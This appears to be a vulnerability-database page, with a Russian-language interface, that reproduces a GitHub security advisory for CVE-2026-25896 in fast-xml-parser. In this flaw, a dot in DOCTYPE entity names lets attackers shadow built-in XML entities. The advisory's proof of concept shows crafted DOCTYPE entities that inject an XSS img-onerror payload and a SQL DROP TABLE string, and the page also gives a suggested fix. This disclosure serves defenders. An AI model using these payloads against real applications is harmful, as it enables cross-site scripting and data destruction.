Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-m7jm-9gc2-mpf2

Опубликовано: 20 фев. 2026
Источник: github
Github: Прошло ревью
CVSS3: 9.3

Описание

fast-xml-parser has an entity encoding bypass via regex injection in DOCTYPE entity names

Entity encoding bypass via regex injection in DOCTYPE entity names

Summary

A dot (.) in a DOCTYPE entity name is treated as a regex wildcard during entity replacement, allowing an attacker to shadow built-in XML entities (<, >, &, ", ') with arbitrary values. This bypasses entity encoding and leads to XSS when parsed output is rendered.

Details

The fix for CVE-2023-34104 addressed some regex metacharacters in entity names but missed . (period), which is valid in XML names per the W3C spec.

In DocTypeReader.js, entity names are passed directly to RegExp():

entities[entityName] = { regx: RegExp(`&${entityName};`, "g"), val: val };

An entity named l. produces the regex /&l.;/g where . matches any character, including the t in <. Since DOCTYPE entities are replaced before built-in entities, this shadows < entirely.

The same issue exists in OrderedObjParser.js:81 (addExternalEntities), and in the v6 codebase - EntitiesParser.js has a validateEntityName function with a character blacklist, but . is not included:

// v6 EntitiesParser.js line 96 const specialChar = "!?\\/[]$%{}^&*()<>|+"; // no dot

Shadowing all 5 built-in entities

Entity nameRegex createdShadows
l./&l.;/g&lt;
g./&g.;/g&gt;
am./&am.;/g&amp;
quo./&quo.;/g&quot;
apo./&apo.;/g&apos;

PoC

const { XMLParser } = require("fast-xml-parser"); const xml = `<?xml version="1.0"?> <!DOCTYPE foo [ <!ENTITY l. "<img src=x onerror=alert(1)>"> ]> <root> <text>Hello &lt;b&gt;World&lt;/b&gt;</text> </root>`; const result = new XMLParser().parse(xml); console.log(result.root.text); // Hello <img src=x onerror=alert(1)>b>World<img src=x onerror=alert(1)>/b>

No special parser options needed - processEntities: true is the default.

When an app renders result.root.text in a page (e.g. innerHTML, template interpolation, SSR), the injected <img onerror> fires.

&amp; can be shadowed too:

const xml2 = `<?xml version="1.0"?> <!DOCTYPE foo [ <!ENTITY am. "'; DROP TABLE users;--"> ]> <root>SELECT * FROM t WHERE name='O&amp;Brien'</root>`; const r = new XMLParser().parse(xml2); console.log(r.root); // SELECT * FROM t WHERE name='O'; DROP TABLE users;--Brien'

Impact

This is a complete bypass of XML entity encoding. Any application that parses untrusted XML and uses the output in HTML, SQL, or other injection-sensitive contexts is affected.

  • Default config, no special options
  • Attacker can replace any &lt; / &gt; / &amp; / &quot; / &apos; with arbitrary strings
  • Direct XSS vector when parsed XML content is rendered in a page
  • v5 and v6 both affected

Suggested fix

Escape regex metacharacters before constructing the replacement regex:

const escaped = entityName.replace(/[.*+?^${}()|[\]\\]/g, '\\$&'); entities[entityName] = { regx: RegExp(`&${escaped};`, "g"), val: val };

For v6, add . to the blacklist in validateEntityName:

const specialChar = "!?\\/[].{}^&*()<>|+";

Severity

CWE-185 (Incorrect Regular Expression)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N - 9.3 (CRITICAL)

Entity decoding is a fundamental trust boundary in XML processing. This completely undermines it with no preconditions.

Ссылки

Пакеты

Наименование

fast-xml-parser

npm
Затронутые версииВерсия исправления

>= 5.0.0, < 5.3.5

5.3.5

Наименование

fast-xml-parser

npm
Затронутые версииВерсия исправления

>= 4.1.3, < 4.5.4

4.5.4

EPSS

Процентиль: 3%
0.00014
Низкий

9.3 Critical

CVSS3

CVE ID

CVE-2026-25896

Дефекты

CWE-185

Связанные уязвимости

ubuntu логотип

CVE-2026-25896

CVSS3: 9.3
ubuntu
около 1 месяца назад

fast-xml-parser allows users to validate XML, parse XML to JS object, or build XML from JS object without C/C++ based libraries and no callback. From 4.1.3to before 5.3.5, a dot (.) in a DOCTYPE entity name is treated as a regex wildcard during entity replacement, allowing an attacker to shadow built-in XML entities (&lt;, &gt;, &amp;, &quot;, &apos;) with arbitrary values. This bypasses entity encoding and leads to XSS when parsed output is rendered. This vulnerability is fixed in 5.3.5.

redhat логотип

CVE-2026-25896

CVSS3: 7.1
redhat
около 1 месяца назад

fast-xml-parser allows users to validate XML, parse XML to JS object, or build XML from JS object without C/C++ based libraries and no callback. From 4.1.3to before 5.3.5, a dot (.) in a DOCTYPE entity name is treated as a regex wildcard during entity replacement, allowing an attacker to shadow built-in XML entities (&lt;, &gt;, &amp;, &quot;, &apos;) with arbitrary values. This bypasses entity encoding and leads to XSS when parsed output is rendered. This vulnerability is fixed in 5.3.5.

nvd логотип

CVE-2026-25896

CVSS3: 9.3
nvd
около 1 месяца назад

fast-xml-parser allows users to validate XML, parse XML to JS object, or build XML from JS object without C/C++ based libraries and no callback. From 4.1.3to before 5.3.5, a dot (.) in a DOCTYPE entity name is treated as a regex wildcard during entity replacement, allowing an attacker to shadow built-in XML entities (&lt;, &gt;, &amp;, &quot;, &apos;) with arbitrary values. This bypasses entity encoding and leads to XSS when parsed output is rendered. This vulnerability is fixed in 5.3.5.

debian логотип

CVE-2026-25896

CVSS3: 9.3
debian
около 1 месяца назад

fast-xml-parser allows users to validate XML, parse XML to JS object, ...

EPSS

Процентиль: 3%
0.00014
Низкий

9.3 Critical

CVSS3

CVE ID

CVE-2026-25896

Дефекты

CWE-185